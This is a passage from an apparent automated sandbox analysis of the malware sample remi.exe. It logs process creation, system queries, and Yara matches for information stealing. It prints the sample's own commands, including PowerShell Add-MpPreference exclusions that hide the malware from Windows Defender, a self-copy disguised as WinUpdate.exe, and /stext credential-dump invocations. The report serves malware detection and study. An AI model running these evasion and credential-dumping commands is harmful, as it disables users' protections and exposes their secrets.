                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_00418754 mouse_event,6_2_00418754
                    Source: C:\Users\user\Desktop\remi.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\remi.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\remi.exeProcess created: C:\Users\user\Desktop\remi.exe "C:\Users\user\Desktop\remi.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\remi.exeProcess created: C:\Users\user\Desktop\remi.exe "C:\Users\user\Desktop\remi.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\remi.exeProcess created: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe "C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess created: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe "C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess created: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe "C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess created: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe /stext "C:\Users\user\AppData\Local\Temp\zkuwzgocnnacbxcaejqamgtb"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess created: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe /stext "C:\Users\user\AppData\Local\Temp\beapzzzejvshdeqenuduxtnkcfqj"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess created: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe /stext "C:\Users\user\AppData\Local\Temp\mgfharkyxdkunkmiffxvayibdtasarj"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess created: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe "C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe"
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess created: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe "C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe"
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess created: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe "C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe"
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess created: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe "C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe"
                    Source: WinUpdate.exe, 0000000B.00000002.4586847438.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerG
                    Source: WinUpdate.exe, 0000000B.00000002.4586847438.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: WinUpdate.exe, 0000000B.00000002.4586847438.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager.
                    Source: WinUpdate.exe, 0000000B.00000002.4584113854.0000000000DA7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagersInfoSy
                    Source: WinUpdate.exe, 0000000B.00000002.4586847438.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managert
                    Source: WinUpdate.exe, 0000000B.00000002.4584113854.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, WinUpdate.exe, 0000000B.00000002.4592052839.000000000406C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                    Source: WinUpdate.exe, 0000000B.00000002.4584113854.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, WinUpdate.exe, 0000000B.00000002.4586847438.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Program Manager]
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_00433E0A cpuid 6_2_00433E0A
                    Source: C:\Users\user\Desktop\remi.exeCode function: EnumSystemLocalesW,6_2_004470AE
                    Source: C:\Users\user\Desktop\remi.exeCode function: GetLocaleInfoW,6_2_004510BA
                    Source: C:\Users\user\Desktop\remi.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_004511E3
                    Source: C:\Users\user\Desktop\remi.exeCode function: GetLocaleInfoW,6_2_004512EA
                    Source: C:\Users\user\Desktop\remi.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,6_2_004513B7
                    Source: C:\Users\user\Desktop\remi.exeCode function: GetLocaleInfoW,6_2_00447597
                    Source: C:\Users\user\Desktop\remi.exeCode function: GetLocaleInfoA,6_2_0040E679
                    Source: C:\Users\user\Desktop\remi.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,6_2_00450A7F
                    Source: C:\Users\user\Desktop\remi.exeCode function: EnumSystemLocalesW,6_2_00450CF7
                    Source: C:\Users\user\Desktop\remi.exeCode function: EnumSystemLocalesW,6_2_00450D42
                    Source: C:\Users\user\Desktop\remi.exeCode function: EnumSystemLocalesW,6_2_00450DDD
                    Source: C:\Users\user\Desktop\remi.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,6_2_00450E6A
                    Source: C:\Users\user\Desktop\remi.exeQueries volume information: C:\Users\user\Desktop\remi.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_00434010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,6_2_00434010
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_0041A7A2 GetUserNameW,6_2_0041A7A2
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_0044800F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,6_2_0044800F
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 15_2_0041739B GetVersionExW,15_2_0041739B
                    Source: C:\Users\user\Desktop\remi.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 0.2.remi.exe.7e60000.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.remi.exe.427e790.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.remi.exe.7e60000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.remi.exe.427e790.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2150371712.0000000007E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2140941294.0000000004261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0.2.remi.exe.4d9f320.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.remi.exe.435c6b8.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.remi.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.remi.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.remi.exe.4d9f320.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.remi.exe.435c6b8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.remi.exe.427e790.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2140941294.0000000004D9F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2140941294.0000000004261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: remi.exe PID: 4372, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: remi.exe PID: 4152, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\WinUpdat\WinUpdat.dat, type: DROPPED
